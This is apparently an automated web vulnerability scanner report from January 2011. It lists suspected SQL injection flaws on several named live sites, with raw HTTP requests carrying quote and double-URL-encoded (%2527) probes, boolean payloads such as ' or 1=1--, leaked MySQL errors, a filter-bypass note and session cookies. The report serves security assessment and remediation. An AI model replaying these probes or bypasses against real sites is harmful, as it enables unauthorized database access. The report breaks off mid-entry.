HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:14:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2
Request 2
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 2
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:14:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2
Request 2
GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 2
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/ Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The com.pogo.ga cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.ga cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?pageSection=homnav_logo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga='; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_bottomtext HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /home/home.jsp?sls=2&site=pogo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The com.pogo.unid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.unid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.unid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /home/home.jsp?sls=2&site=pogo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856%2527; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true'; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
1.23. http://www.pogo.com/img/prize/en_US/cash-giveaway [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pogo.com
Path:
/img/prize/en_US/cash-giveaway
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19192500'%20or%201%3d1--%20 and 19192500'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /img/prize/en_US/cash-giveaway?119192500'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<h1>The page you requested could not be found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br /> <strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong> <div class="clear20"></div>
<h1>The page you requested could not be found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br /> <strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong> <div class="clear20"></div>
The com.pogo.hp.ls.cfg cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.hp.ls.cfg cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /prize/prize.do?pageSection=footer_prize HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0'; com.pogo.tafrcode=;
The op600clubpogoliid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op600clubpogoliid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /prize/prize.do?pageSection=footer_prize HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e'; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Conte ...[SNIP]...
Request 2
GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 07:24:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 X-Pingback: http://www1.peanutlabs.com/xmlrpc.php Link: <http://www1.peanutlabs.com/?p=568>; rel=shortlink Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29570
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /wp-content/plugins/contact-form-7%2527/scripts.js HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Conte ...[SNIP]...
Request 2
GET /wp-content/plugins/contact-form-7%2527%2527/scripts.js HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 2
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 07:24:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 X-Pingback: http://www1.peanutlabs.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40811
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
